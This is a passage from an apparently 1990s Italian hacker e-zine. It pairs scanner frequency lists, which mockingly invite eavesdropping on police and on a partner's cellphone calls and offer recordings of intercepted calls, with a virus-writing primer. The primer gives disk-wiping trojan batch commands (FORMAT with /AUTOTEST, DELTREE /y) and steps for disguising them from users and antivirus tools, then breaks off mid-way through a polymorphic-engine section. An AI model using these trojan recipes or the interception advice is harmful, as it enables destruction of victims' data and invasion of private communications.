470-512 Mhz Steps 12.5 Khz Mode NFM -* UHF (T) Band *-
806-956 Mhz Steps 12.5 Khz Mode NFM -* Cell. Band *-

A scopo dimostrativo seguono alcune frequenze moolto interessanti, che sono
certo non vi sognereste mai di ascoltare senza permesso scritto delle
autorita' competenti.
Sempre a scopo di esempio troverete allegati a questo articolo alcuni file
sonori che vi daranno un'idea di cosa si puo' sentire con un poco

di 
pazienza...ehm

*******************************************************************************
FREQUENZE DEI TUTORI DEL DISORDINE PUBBLICO ( PULOTT )
*******************************************************************************

77.8250
77.1500
415.9000
416.0500
426.0500
425.9000
77.1000
78.5250
78.0000
425.0000
426.1250
426.2750
426.7750
162.3500 trasmissioni dati
124.8000 aeronautica
145.6250
162.3750
162.6600
164.8000 trasmissioni dati
124.4500 aeronautica
87.9000
83.1250
83.1300
439.1625
68.1850

*******************************************************************************
FREQUENZE DEL CELLULARE DELLA VOSTRA RAGAZZA (o del suo ragazzo hehe)
*******************************************************************************

74.7300
74.2550
810.5500
811.3125
812.3500
812.6000
813.6375
822.9750
821.6250
823.8750
824.3250
824.7500
825.2250
825.6750
826.1250
827.0250
827.4750
828.3750
828.8000
829.0625
829.3125
829.8375
830.3500
831.1125
831.6375
831.8875
806.2625
808.9625
809.4125
811.5750
813.3750
824.7750
74.4050
811.2500
811.4125
806.6625
806.6750
808.5125
808.9125
809.1500
809.5000
811.4875
811.7500
812.0875
823.4250
827.9250
806.8250
806.9000
808.5500
810.3750
810.6375
810.7125
810.7250
811.0625
811.8375
812.5000
812.8625
823.5125
823.7625
825.1875
826.5750
829.5750
830.0875
811.4250
811.8000
807.1625
810.8875
812.1750
836.0875
808.0625
823.8500
807.6125
809.8625
818.2125
811.7250

-------------------------------------------------------------------------------
MP3 CHE PASSIONE !!
-------------------------------------------------------------------------------

Nel file radio01.zip trovate allegati a questo articoletto alcuni mp3 moolto
interessanti..
Sono degli esempi sulle possibilit… che il radioscanning offre.

cell!!s.mp3 E' un piccolo mix di varie telefonate prese a caso da vari
cellulari. (Se per caso tra voi c'Š uno degli "intervistati"
non si scandalizzi..il mondo lo ascolta ^_^
telec!!s.mp3 E' uno dei tanti messaggi automatici di Telecom Italia Mobile,
In particolare vi avvisa che l'utente chiamato non Š
raggiungibile.
telec2!!s.mp3 Avete presente il nuovo tacs ricaricabile?
Bene questo Š quello che sentirete...nel controllare il vostro
credito residuo...ma potete pure chiedere a me!! HAHA
telec3!!s.mp3 Ma gli addetti Telecom non ci sono proprio mai...tranne
che per farvi pagare la bolletta ovviamente !


===============================================================================

TELEPHONE-RELATED FREQUENCIES


-------------------------------------------------------------------------------
TELEPHONE FREQUENCY BANDS - BY FREQUENCY
-------------------------------------------------------------------------------

35.22 - 35.66 RADIO PAGING
43.22 - 43.64 RADIO PAGING
46.61 - 46.97 CORDLESS TELEPHONES
49.67 - 49.97 WIRELESS ROOM/BABY MONITORS
145.10 - 145.50 HAM AUTOPATCH
146.61 - 147.39 HAM AUTOPATCH
152.03 - 152.21 RCC ~& RADIO PAGING
152.48 - 152.825 IMTS TELEPHONE/CANADA
152.51 - 152.81 IMTS TELEPHONE ~& RADIO PAGING
157.74 - 158.10 RADIO PAGING
158.49 - 158.70 RADIO PAGING
158.91 - 161.565 RAILROADS/CANADA
160.215 - 161.565 RAILROADS/USA
161.80 - 162.025 MARINE OPERATOR SHIP/SHORE
223.85 - 224.98 HAM AUTOPATCH
442.00 - 445.00 HAM AUTOPATCH
447.00 - 450.00 HAM AUTOPATCH
451.175 - 451.6875 TELEPHONE REPAIR
454.025 - 454.35 RCC~ RADIO PAGING
454.40 - 454.65 IMTS TELEPHONE ~& RADIO PAGING
454.70 - 454.975 TELCO AIR/GROUND OPERATORS
459.025 - 459.65 RADIO PAGING
459.70 - 459.975 TELCO AIR/GROUND AIRCRAFT
479.025 - 493.00 OFFSHORE OIL PLATFORMS
861.0125 - 865.2375 BASIC EXCHANGE RADIO SERVICE
869.00 - 894.00 CELLULAR PHONES
902.00 - 928.00 900 MHZ CORDLESS PHONES
929.00 - 932.00 RADIO PAGING

-------------------------------------------------------------------------------
TELEPHONE FREQUENCY BANDS - BY SERVICE
-------------------------------------------------------------------------------

902.00 - 928.00 900 MHZ CORDLESS PHONES
861.0125 - 865.2375 BASIC EXCHANGE RADIO SERVICE
869.00 - 894.00 CELLULAR PHONES
46.61 - 46.97 CORDLESS TELEPHONES
145.10 - 145.50 HAM AUTOPATCH
146.61 - 147.39 HAM AUTOPATCH
223.85 - 224.98 HAM AUTOPATCH
442.00 - 445.00 HAM AUTOPATCH
447.00 - 450.00 HAM AUTOPATCH
152.48 - 152.825 IMTS TELEPHONE/CANADA
152.51 - 152.81 IMTS TELEPHONE ~& RADIO PAGING
454.40 - 454.65 IMTS TELEPHONE ~& RADIO PAGING
161.80 - 162.025 MARINE OPERATOR SHIP/SHORE
479.025 - 493.00 OFFSHORE OIL PLATFORMS
35.22 - 35.66 RADIO PAGING
43.22 - 43.64 RADIO PAGING
157.74 - 158.10 RADIO PAGING
158.49 - 158.70 RADIO PAGING
459.025 - 459.65 RADIO PAGING
929.00 - 932.00 RADIO PAGING
158.91 - 161.565 RAILROADS/CANADA
160.215 - 161.565 RAILROADS/USA
152.03 - 152.21 RCC ~& RADIO PAGING
454.025 - 454.35 RCC~ & RADIO PAGING
454.70 - 454.975 TELCO AIR/GROUND OPERATORS
459.70 - 459.975 TELCO AIR/GROUND AIRCRAFT
451.175 - 451.6875 TELEPHONE REPAIR
49.67 - 49.97 WIRELESS ROOM/BABY MONITORS

-------------------------------------------------------------------------------
900 MHZ CORDLESS TELEPHONE FREQUENCIES - (AFTER MID-1992) - 902 - 928 MHZ NFM
-------------------------------------------------------------------------------

902.000 - 928.000 900 MHZ CORDLESS TELEPHONES (60-100 KHZ SPACING)

PANASONIC KX-T9000 (30 CHANNELS)

902.1 - 903.9 TRANSPONDER (BASE) FREQUENCIES (60 KHZ SPACING)
926.1 - 927.9 HANDSET FREQUENCIES

FIRST CHANNEL

902.1 DEFAULT TRANSPONDER FREQUENCY
926.1 HANDSET FREQUENCY (24 MHZ HIGHER)

CH BASE HANDSET CH BASE HANDSET
-- ------- ------- -- ------- -------
01 902.100 926.100 08 902.310 926.310
02 902.130 926.130 09 902.340 926.340
03 902.160 926.160 10 902.370 926.370
04 902.190 926.190 11 902.400 926.400
05 902.220 926.220 ^ ^ ^
06 902.250 926.250 ^ ^ ^
07 902.280 926.280 59 903.870 927.870

V-TECH TROPEZ DX900 (20 CHANNELS)

905.6 - 907.5 TRANSPONDER (BASE) FREQUENCIES (100 KHZ SPACING)
925.5 - 927.4 HANDSET FREQUENCIES

ONE SUCH CHANNEL

906.375 DEFAULT TRANSPONDER FREQUENCY
926.275 HANDSET FREQUENCY

OTHER 900 MHZ CORDLESS PHONES

AT&T #9120 - 902-905 & 925-928 MHZ
OTRON CORP. #CP-1000 - 902.1-903.9 & 926.1-927.9 MHZ
SAMSUNG #SP-R912- 903 & 927 MHZ

-------------------------------------------------------------------------------
CELLULAR TELEPHONE FREQUENCIES BANDS
-------------------------------------------------------------------------------

824.0000 - 834.2600 NON-WIRELINE COS. (RADIO COMMON CARRIERS) MOBILES
845.0000 - 846.5000 NON-WIRELINE COS. (RADIO COMMON CARRIERS) MOBILES
869.0000 - 879.3600 NON-WIRELINE COS. (RADIO COMMON CARRIERS) BASES
890.0000 - 891.5000 NON-WIRELINE COS. (RADIO COMMON CARRIERS) BASES

835.6500 - 845.0000 WIRELINE COS. (LOCAL TELEPHONE COMPANY) MOBILES
846.5000 - 849.0000 WIRELINE COS. (LOCAL TELEPHONE COMPANY) MOBILES
880.6500 - 890.0000 WIRELINE COS. (LOCAL TELEPHONE COMPANY) MOBILES ?
891.5000 - 894.0000 WIRELINE COS. (LOCAL TELEPHONE COMPANY) MOBILES ?

829.000 - 849.000 CELLULAR TRANS. FREQUENCY RANGE (30 KHZ)
869.000 - 894.000 CELLULAR RECV. FREQUENCY RANGE (PAIRED FREQS)
869.0000 - 880.0000 SYSTEM A - NON WIRELINE TELEPHONE FREQUENCIES
880.0000 - 894.0000 SYSTEM B - WIRELINE TELEPHONE FREQUENCIES

-------------------------------------------------------------------------------
CELLULAR TELEPHONE FREQUENCIES
-------------------------------------------------------------------------------

Base Mobile Base Mobile

~Transmit Transmit~ Transmit~ Transmit

Channel Frequency Frequency Channel Frequency Frequency

Number (MHz) (MHz) ~ Number (MHz) (MHz) ~


1 870.0300 825.0300 30 870.9000 825.9000
2 870.0600 825.0600 31 870.9300 825.9300
3 870.0900 825.0900 32 870.9600 825.9600
4 870.1200 825.1200 33 870.9900 825.9900
5 870.1500 825.1500 34 871.0200 826.0200
6 870.1800 825.1800 35 871.0500 826.0500
7 870.2100 825.2100 36 871.0800 826.0800
8 870.2400 825.2400 37 871.1100 826.1100
9 870.2700 825.2700 38 871.1400 826.1400
10 870.3000 825.3000 39 871.1700 826.1700
11 870.3300 825.3300 40 871.2000 826.2000
12 870.3600 825.3600 41 871.2300 826.2300
13 870.3900 825.3900 42 871.2600 826.2600
14 870.4200 825.4200 43 871.2900 826.2900
15 870.4500 825.4500 44 871.3200 826.3200
16 870.4800 825.4800 45 871.3500 826.3500
17 870.5100 825.5100 46 871.3800 826.3800
18 870.5400 825.5400 47 871.4100 826.4100
19 870.5700 825.5700 48 871.4400 826.4400
20 870.6000 825.6000 49 871.4700 826.4700
21 870.6300 825.6300 50 871.5000 826.5000
22 870.6600 825.6600 51 871.5300 826.5300
23 870.6900 825.6900 52 871.5600 826.5600
24 870.7200 825.7200 53 871.5900 826.5900
25 870.7500 825.7500 54 871-6200 826-6200
26 870.7800 825.7800 55 871 6500 826.6500
27 870.8100 825.8100 56 871.6800 826.6800
28 870.8400 825.8400 57 871.7100 826.7100
29 870.8700 825.8700 58 871.7400 826.7400

59 871.7700 826.7700 111 873.3300 828.3300
60 871.8000 826.8000 112 873.3600 828.3600
61 871.8300 826.8300 113 873.3900 828.3900
62 871.8600 826.8600 114 873.4200 828.4200
63 871.8900 826.8900 115 873.4500 828.4500
64 871.9200 826.9200 116 873.4800 828.4800
65 871.9500 826.9500 117 873.5100 828.5100
66 871.9800 826.9800 118 873.5400 828.5400
67 872.0100 827.0100 119 873.5700 828.5700
68 872.0400 827.0400 120 873.6000 828.6000
69 872.0700 827.0700 121 873.6300 828.6300
70 872.1000 827.1000 122 873.6600 828.6600
71 872.1300 827.1300 123 873.6900 828.6900
72 872.1600 827.1600 124 873.7200 828.7200
73 872.1900 827.1900 125 873.7500 828.7500
74 872.2200 827.2200 126 873.7800 828.7800
75 872.2500 827.2500 127 873.8100 828.8100
76 872.2800 827.2800 128 873.8400 828.8400
77 872.3100 827.3100 129 873.8700 828.8700
78 872.3400 827.3400 130 873.9000 828.9000
79 872.3700 827.3700 131 873.9300 828.9300
80 872.4000 827.4000 132 873.9600 828.9600
81 872.4300 827.4300 133 873.9900 828.9900
82 872.4600 827.4600 134 874.0200 829.0200
83 872.4900 827.4900 135 874.0500 829.0500
84 872.5200 827.5200 136 874.0800 829.0800
85 872.5500 827.5500 137 874.1100 829.1100
86 872.5800 827.5800 138 874.1400 829.1400
87 872.6100 827.6100 139 874.1700 829.1700
88 872.6400 827.6400 140 874.2000 829.2000
89 872.6700 827.6700 141 874.2300 829.2300
90 872.7000 827.7000 142 874.2600 829.2600
91 872.7300 827.7300 143 874.2900 829.2900
92 872.7600 827.7600 144 874.3200 829.3200
93 872.7900 827.7900 145 874.3500 829.3500
94 872.8200 827.8200 146 874.3800 829.3800
95 872.8500 827.8500 147 874.4100 829.4100
96 872.8800 827.8800 148 874.4400 829.4400
97 872.9100 827.9100 149 874.4700 829.4700
98 872.9400 827.9400 150 874.5000 829.5000
99 872.9700 827.9700 151 874.5300 829.5300
100 873.0000 828.0000 152 874.5600 829.5600
101 873.0300 828.0300 153 874.5900 829.5900
102 873.0600 828.0600 154 874.6200 829.6200
103 873.0900 828.0900 155 874.6500 829.6500
104 873.1200 828.1200 156 874.6800 829.6800
l05 873.1500 828.1500 157 874.7100 829.7100
106 873.1800 828.1800 158 874.7400 829.7400
107 873.2100 828.2100 159 874.7700 829.7700
108 873.2400 828.2400 160 874.8000 829.8000
109 873.2700 828.2700 161 874.8300 829.8300
110 873.3000 828.3000 162 874.8600 829.8600

163 874.8900 829.8900 215 876.4500 831.4500
164 874.9200 829.9200 216 876.4800 831.4800
165 874.9500 829.9500 217 876.5100 831.5100
166 874.9800 829.9800 218 876.5400 831.5400
167 875.0100 830.0100 219 876.5700 831.5700
168 875.0400 830.0400 220 876.6000 831.6000
169 875.0700 830.0700 221 876.6300 831.6300
170 875.1000 830.1000 222 876.6600 831.6600
171 875.1300 830.1300 223 876.6900 831.6900
172 875.1600 830.1600 224 876.7200 831.7200
173 875.1900 830.1900 225 876.7500 831.7500
174 875.2200 830.2200 226 876.7800 831.7800
175 875.2500 830.2500 227 876.8100 831.8100
176 875.2800 830.2800 228 876.8400 831.8400
177 875.3100 830.3100 229 876.8700 831.8700
178 875.3400 830.3400 230 876.9000 831.9000
179 875.3700 830.3700 231 876.9300 831.9300
180 875.4000 830.4000 232 876.9600 831.9600
181 875.4300 830.4300 233 876.9900 831.9900
182 875.4600 830.4600 234 877.0200 832.0200
183 875.4900 830.4900 235 877.0500 832.0500
184 875.5200 830.5200 236 877.0800 832.0800
185 875.5500 830.5500 237 877.1100 832.1100
186 875.5800 830.5800 238 877.1400 832.1400
187 875.6100 830.6100 239 877.1700 832.1700
188 875.6400 830.6400 240 877.2000 832.2000
189 875.6700 830.6700 241 877.2300 832.2300
190 875.7000 830.7000 242 877.2600 832.2600
191 875.7300 830.7300 243 877.2900 832.2900
192 875.7600 830.7600 244 877.3200 832.3200
193 875.7900 830.7900 245 877.3500 832.3500
194 875.8200 830.8200 246 877.3800 832.3800
195 875.8500 830.8500 247 877.4100 832.4100
196 875.8800 830.8800 248 877.4400 832.4400
197 875.9100 830.9100 249 877.4700 832.4700
198 875.9400 830.9400 250 877.5000 832.5000
199 875.9700 830.9700 251 877.5300 832.5300
200 876.0000 831.0000 252 877.5600 832.5600
201 876.0300 831.0300 253 877.5900 832.5900
202 876.0600 831.0600 254 877.6200 832.6200
203 876.0900 831.0900 255 877.6500 832.6500
204 876.1200 831.1200 256 877.6800 832.6800
205 876.1500 831.1500 257 877.7100 832.7100
206 876.1800 831.1800 258 877.7400 832.7400
207 876.2100 831.2100 259 877.7700 832.7700
208 876.2400 831.2400 260 877.8000 832.8000
209 876.2700 831.2700 261 877.8300 832.8300
210 876.3000 831.3000 262 877.8600 832.8600
211 876.3300 831.3300 263 877.8900 832.8900
212 876.3600 831.3600 264 877.9200 832.9200
213 876.3900 831.3900 265 877.9500 832.9500
214 876.4200 831.4200 266 877.9800 832.9800

267 878.0100 833.0100 319 879.5700 834.5700
268 878.0400 833.0400 320 879.6000 834.6000
269 878.0700 833.0700 321 879.6300 834.6300
270 878.1000 833.1000 322 879.6600 834.6600
271 878.1300 833.1300 323 879.6900 834.6900
272 878.1600 833.1600 324 879.7200 834.7200
273 878.1900 833.1900 325 879.7500 834.7500
274 878.2200 833.2200 326 879.7800 834.7800
275 878.2500 833.2500 327 879.8100 834.8100
276 878.2800 833.2800 328 879.8400 834.8400
277 878.3100 833.3100 329 879.8700 834.8700
278 878.3400 833.3400 330 879.9000 834.9000
279 878.3700 833.3700 331 879.9300 834.9300
280 878.4000 833.4000 332 879.9600 834.9600
281 878.4300 833.4300 333 879.9900 834.9900
282 878.4600 833.4600 334 880.0200 835.0200
283 878.4900 833.4900 335 880.0500 835.0500
284 878.5200 833.5200 336 880.0800 835.0800
285 878.5500 833.5500 337 880.1100 835.1100
286 878.5800 833.5800 338 880.1400 835.1400
287 878.6100 833.6100 339 880.1700 835.1700
288 878.6400 833.6400 340 880.2000 835.2000
289 878.6700 833.6700 341 880.2300 835.2300
290 878.7000 833.7000 342 880.2600 835.2600
291 878.7300 833.7300 343 880.2900 835.2900
292 878.7600 833.7600 344 880.3200 835.3200
293 878.7900 833.7900 345 880.3500 835.3500
294 878.8200 833.8200 346 880.3800 835.3800
295 878.8500 833.8500 347 880.4100 835.4100

-------------------------------------------------------------------------------
Per il momento e' tutto signori, eventuali domande non fatele a me
perche' io non ho detto niente, non so niente e soprattutto
non c'ero, e se c'ero dormivo OK ??
-------------------------------------------------------------------------------
Vanadio


ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ÈÍViRiiÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄÄÄÄÄÄÄÄÄ ViR0PEDiA v1.0 ÄÄÄÄÄÄÄÄÄÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
Teoria & Tecnica della Programmazione Virale
I-II parte

INTRODUZIONE

Cos'Š un virus informatico? Analogamente ai virus biologici, un parassita
informatico Š un organismo capace di replicarsi tramite portatori sani e capace
di causare malfunzionamenti al sistema. E' ovvio che nel paragone con la parola
organismo si vuole intendere un blocco di codice, di istruzioni,
fondalmentalmente un virus informatico Š solo un programmma, diverso da quelli
normali, magari anche un po' intelligente, ma sempre un programma. Gli studi
condotti sui virus informatici finora hanno classificato e ripartito i
parassiti in diverse specie: la prima differenza Š a livello generale, la
seconda classificazione invece Š pi— specifica (riguarda il codice e le
funzioni proprie del virus stesso).


Iø CLASSIFICAZIONE

- trojan horse (=cavallo di troia)
- virus
- worm (=verme)

TROJAN HORSE
Un trojan horse non Š propriamente un virus, ma un programma distruttivo pronto
a esplodere. Con questo si vuole intendere che mentre lo scopo del virus Š
cercare di restare nascosto il pi— possibile e replicarsi, lo scopo del cavallo
di troia Š danneggiare esplicitamente un sistema. Sono chiamati trojan horse
perch‚ di solito vengono distribuiti sotto false spoglie, magari fingendo di
essere programmi ambiti o molto ricercati dall'utenza. Famosi trojan horse
furono quelli che reclamavano il PKZIP300B. Alcuni esempi pratici? I BAT-trojan
horse sono i pi— semplici e efficaci da costruire, usando un qualsiasi editor
di testo:

C:\>EDIT TROJAN1.BAT

@FORMAT C: /AUTOTEST


C:\>EDIT TROJAN2.BAT

@DELTREE /y C:\*.*

Il carattere "@" serve a nascondere l'echo su schermo del comando (altrimenti
l'utente si accorgerebbe subito di cosa succede). Nel primo caso viene
utilizzata una piccola backdoor del comando FORMAT, precisamente il parametro
/AUTOTEST. Di solito l'esecuzione di questo comando a rischio chiede sempre
all'utente di ripensarci, prima di avviare la formattazione.

C:\>FORMAT C:

ATTENZIONE: TUTTI I DATI SUL DISCO FISSO C: ANDRANNO PERSI
Continuare con la formattazione (S/N)?

Tuttavia usando /AUTOTEST questa richiesta non viene effettuata e parte
direttamente la formattazione del disco (non si sa perch‚ la Microsoft abbia
lasciato questo strano parametro). Stessa cosa per il comando DELTREE, che
combinato con l'opzione /y rimuove tutti i files e tutte le cartelle dal disco
C. Varianti simili si possono ottenere con il normale comando DEL del DOS. Per
rendere uno di questi trojan horse pi— infido e intercettabile dall'utente
ignaro potete procedere come segue:

- create il file BAT col trojan senza usare il comando @
- usate una utility tipo BAT2COM per convertire il file BAT in un eseguibile
COM
- per rendere la dimensione del trojan pi— grande (quindi pi— credibile) usate
COPY /B trojan.com + command.com final.com
- comprimete il file FINAL.COM usando PKLITE.COM oppure DIET, ICE

In questo modo sar… veramente difficile rilevare il trojan nel file, anche per
un antivirus. Rientrano nella categoria anche le Logic Bomb (=bombe logiche)
che sono dei particolari trojan attivati da un evento temporale o dal
verificarsi di una certa condizione.

WORM
Concetto pi— avanzato di virus, si pu• definire come un virus che viaggia e si
riproduce lungo le reti. Il pi— famoso nella storia Š quello di Robert Morris
jr., giovane americano che negli anni '80 riusc a mandare in tilt migliaia di
computer a causa di una replicazione incontrollata del suo verme, che sfruttava
un vecchio bug del sendmail. Oggi non esistono ancora worm perfezionati a tal
punto da propagarsi cos rapidamente, questo anche a causa dei numerosi e
diversi sistemi presenti su Internet, ma tuttavia Unix/Linux e Java sembrano
terreno fertile per lo sviluppo dei worm.

VIRUS
Ecco l'argomento principale di cui ci occuperemo. I virus, studiati ormai da
anni, sono classificati in modo specifico in base al funzionamento.


IIø CLASSIFICAZIONE

I- FLOPPY BOOT e MBR VIRUS
Infettano un particolare settore dei dischi, quello iniziale, di avvio. Nei
dischetti tale settore contiene il codice che visualizza il famoso messaggio:
"Disco non di avvio / Sostituire il disco e premere un tasto". Nel disco
rigido invece si parla di Master Boot Record (=record di avviamento principale)
meglio conosciuto come MBR. Furono i primi virus ad essere creati e a
diffondersi rapidamente, oggi in fase di estizione a causa dell'accesso 32-bit
di Windows 95 ai dischi.
Virus famosi: Form, PingPong, Stoned, AntiEXE, NYB-B1, DiskKiller, Michelangelo

II- DOS-EXEC FILE VIRUS
Stragrande maggioranza di virus, capaci di infettare i files eseguibili del
sistema operativo.
I loro bersagli preferiti sono i file COM e EXE del DOS. Rientrano in questa
categoria anche alcuni virus che infettano i normali file BAT, facilmente
scopribili. Oggi in via di estinzione.
Virus famosi: November 17, Jerusalem, Ontario, Vienna

III- WIN-EXEC FILE VIRUS
Nuovi virus, che possono infettare diversi tipi di oggetti:

NE-EXE NewExecutable File EXE per Windows 3.1 16-bit
SCR ScreenSaver File SCR per Windows 3.1 16-bit
PE-EXE PortableExecutable File EXE per Windows 95 32-bit
VXD Device Driver File VXD per Windows 95 32-bit

Esistono solo una quindicina di virus di questo tipo, ancora non tanto
perfezionati.

IV- MACRO VIRUS
La moda del momento, ovvero i virus scritti in VBA (Visual Basic for
Application). Sono virus multipiattaforma (possono funzionare sia su sistemi
Windows che su Macintosh) in quanto non dipendono dal sistema operativo ma da
una particolare applicazione che consente l'uso di macro, cioŠ di comandi
automatici. Ecco i programmi suscettibili a questo tipo di infezione:

MS-WORD 6.0 - 95 - 97 File di tipo DOC
MS-EXCEL 5.0 - 95 - 97 File di tipo XLS
LOTUS AMIPRO File di tipo SAM, SMM

esiste poi una categoria di applicazioni "a rischio" ancora in fase di
sperimentazione (Lotus 1-2-3) e in genere tutte le applicazioni che permettono
l'uso di macro.
Virus famosi: Concept, Wazzu, Laroux, Alliance

V- MULTIPARTITO
Quando un virus riesce ad infettare diversi oggetti di quelli sopra elencati,
si definisce multipartito. Esempi:

Flip.2153 MBR + DOS-EXEC
Junkie.1027 FLOPPY + MBR + DOS-EXEC
Win.Apparition WIN-EXEC + MACRO
Win.Ph33r DOS-EXEC + WIN-EXEC

Esiste infine un'ultima suddivisione, fatta in base alla tipologia di virus,
cioŠ guardando proprio le funzioni e il codice interno del programma-virus.

IIIø CLASSIFICAZIONE

I- Virus COMPANION
Virus elementari, molto facili da rimuovere che sfruttano un buco offerto dal
DOS. Sotto DOS esiste una grossa ambiguit… quando si verifica una condizione
simile: una directory contiene 2 files (PIPPO.COM e PIPPO.EXE), lanciando il
comando "C:\>PIPPO" senza specificare null'altro, quale dei due files sar…
caricato prima? Ebbene il sistema Microsoft carica sempre prima i file COM
quando viene specificata l'estensione, per cui Š facile intuire come si
comportano i virus Companion:

- cerca un file .EXE nella directory
- crea un secondo file, con lo stesso identico nome ma con estensione .COM
- nascondi il file .COM per ingannare l'utente (ATTRIB +H)

Quando l'utente digita "PIPPO", crede di aver caricato "PIPPO.EXE", quando in
realt… non sa che Š stato avviato il virus conenuto in "PIPPO.COM" che di certo
avr… infettato un altro file.

II- Virus AZIONE DIRETTA
Si chiamano cos perch‚ agiscono direttamente infettando i files delle
directory. Ogni volta che un programma infetto viene eseguito, il virus esegue
una scansione dei files presenti nella directory corrente (o in altre directory
predefinite come C:\DOS, C:\, C:\WINDOWS) alla ricerca di possibili "vittime".
Una volta trovato un "ospite", il virus lo contagia e quindi passa ad eseguire
il programma originale per non destare i sospetti dell'utente.

III- Virus TSR
Categoria gi… pi— complessa di virus, in quanto riesce a rimanere attiva, di
nascosto, all'interno del sistema operativo, sostituendo parti di esso. I virus
TSR (Terminate and Stay Resident) riservano una porzione di memoria per s‚
stessi (solitamente memoria alta) o sfruttano dei buchi di RAM non usati dal
DOS dove potersi copiare, quindi acquistano una priorit… maggiore rispetto al
sistema operativo stesso per alcune operazioni "a rischio" come apertura di un
file, esecuzione di un file, rename, attrib, accesso a un dischetto, ecc.
Ognuna di queste operazioni pu• essere intercettata dal parassita che prima di
eseguire la vera procedura, infetta l'oggetto in uso (file o dischetto).

IV- Virus STEALTH
Quando un virus Š attivo in memoria, pu• interferire col sistema operativo e
pu• farlo anche bene. La simbiosi pu• essere tale che il parassita prende il
controllo totale su alcune funzioni base del DOS. Tra le cose che un virus pu•
fare ovviamente rientra la capacit… di far apparire tutto normale, cioŠ
nascondere tutti i sintomi e i segnali di allarme che possano farlo
individuare. Questa tecnica Š detta "stealth" ed esistono varianti notevoli di
questo furbo stratagemma:

SIZE HIDING
Se un virus X Š lungo 100 bytes, tutti i files infetti avranno la loro
dimensione aumentata di 100. Un virus pu• intercettare il comando "DIR" e
sottrarre il valore 100 alla dimensione dei file infetti, facendoli sembrare
non infetti all'output del comando.

MBR STEALTH
Un virus che infetta l'MBR, salva una copia del vecchio master boot record
prima di sostituirlo con il codice virale. Quando un antivirus va a leggere
l'MBR, il parassita intercetta la lettura e restituisce la copia originale
salvata, mascherando l'infezione presente.

CLEAN ON-THE-FLY
Il virus pu• intercettare tutte le operazioni di lettura sui files e
modificarne l'output. Se ad esempio un programma prova a leggere un file
infetto, il virus, attivo in memoria, intercetta l'operazione e ripulisce il
file prima della lettura, rendendolo trasparente al controllo. Una volta finita
l'operazione, il virus re-infetta il file. E' questo uno dei metodi pi—
efficaci, che riesce ad annullare anche i controlli tramite CRC-checksum.

V- Virus ENCRYPTED (=cifrati)
Un virus Š un programma come tanti altri, quindi formato da righe di codice.
Ogni virus viene infatti identificato dall'antivirus attraverso una particolare
sequenza di istruzioni in linguaggio macchina (stringa) che Š propria di ogni
parassita. Questa stringa non Š altro che una serie di bytes, ognuno dei quali
corrisponde ad una istruzione assembler o a un testo particolare racchiuso nel
virus. Ad esempio in tutti i files infetti dal virus Tai-Pan.438 Š possibile
leggere questa stringa "[Whisper presenterar Tai-Pan]", il che rende il virus
facilmente identificabile. Meglio ancora Š l'identificazione tramite il codice
vero e proprio del virus: tutti i files infetti dal virus Tai-Pan.438 infatti
presentano queste istruzioni:

Bytes Codice Macchina
E80000 CALL xxxx
5E POP SI
83EE03 SUB SI,+03
B8CE7B MOV AX,7BCE
CD21 INT 21
3DCE7B CMP AX,7BCE
7517 JNZ yyyy
0E PUSH CS
1F POP DS

dove "xxxx" e "yyyy" sono valori generici che cambiano per ogni file. Quindi il
virus Tai-Pan Š riconoscibile ricercando questa stringa esadecimale
"E800005E83EE03B8CE7BCD213DCE7B75170E1F". Per ovviare questo riconoscimento ed
essere meno riconoscibili i virus ricorrono alla cifratura del codice
(encryption). Il codice cioŠ si presenta in questo modo:

VIRUS NON CIFRATO VIRUS CIFRATO
1: istr1 0: DECIFRATORE
2: istr2 1: istrX
3: istr3 2: istrY
4: __.. 3: istrZ
5: "esempio" 4: ____.
5: "hqhrtac"

Il virus non cifrato Š facilmente riconoscibile dalle istruzioni che lo
compongono e anche dalla stringa di testo "esempio" presente al suo interno. Lo
stesso virus, in forma cifrata, diventa irriconoscibile, poich‚ ogni istruzione
viene camuffata e trasformata in un'altra totalmente diversa di significato;
cos anche il testo, diventa una stringa incomprensibile. Inoltre il sistema di
cifratura utilizza una chiave (di solito 8/16-bit) che pu• essere fissa ma
anche variabile, cioŠ mutevole ad ogni infezione. Questo significa che il corpo
cifrato del virus varia per ogni file infetto. Ovviamente in capo al virus deve
esserci un decifratore capace di riportare allo stato originale il codice del
virus. Ecco ad esempio il motore cifrante dello Junkie.1027, presente sempre in
testa al virus:

Riga Bytes Istruzione
0001: BE8FE0 MOV SI,0008
0002: B9F401 MOV CX,01F4
0003: 26 ES:
0004: 8134BC2E XOR WORD PTR [SI],2EBC
0005: 46 INC SI
0006: 46 INC SI
0007: E2F7 LOOP $0001
0008: %qui inizia il corpo del virus in forma cifrata

La prima istruzione punta l'inizio del corpo del virus (riga 0008); la seconda
imposta il numero di bytes da decifrare, solitamente corrispondente alla
lunghezza del virus stesso (01F4 = 500 WORD = 1000 BYTES ¯ 1027). Ecco di
seguito l'operatore crittografico "XOR" che lavora usando una chiave a 16-bit
(1 WORD). Quindi ci sono le istruzioni di scarto per passare alla word
successiva e infine l'istruzione ciclica LOOP. Questo Š un esempio generico di
motore crittografico, le varianti possono essere le pi— svariate, a partire
dagli operatori matematici usati (XOR, ADD, SUB, NOT, ADC, SBB) o sulle
istruzioni cicliche (cambiabili con salti condizionati JZ, JNZ).

VI- Virus POLIMORFICI
Utilizzando la tecnica della cifratura un virus diventa riconoscibile solo ed
esclusivamente dal suo motore crittografico, ma usando le opportune accortezze
Š possibile realizzare dei parassiti che modificano questo motore cifrante ad
ogni infezione. Cos Š difficile che 2 files infetti dallo stesso virus
risultino simili. Questa tecnica, denominata polimorfismo, viene realizzata sia
usando dei tools esterni (MtE, TPE, DAME, DSCE, SMEG) che vengono linkati al
corpo del virus, sia scrivendo un proprio codice polimorfico all'interno del
virus.
Grosso modo una routine polimorfa segue questo schema di funzionamento:

- la prima cosa da fare Š scrivere un motore crittografico molto flessibile,
dove le istruzioni possano essere scambiate, usando diversi operatori
crittografici, il motore dello Junkie.1027 visto prima pu• andare bene:

0001: BE0800 MOV SI,0008
0002: B9F401 MOV CX,01F4
0003: 26 ES:
0004: 8134BC2E XOR WORD PTR [SI],2EBC
0005: 46 INC SI
0006: 46 INC SI
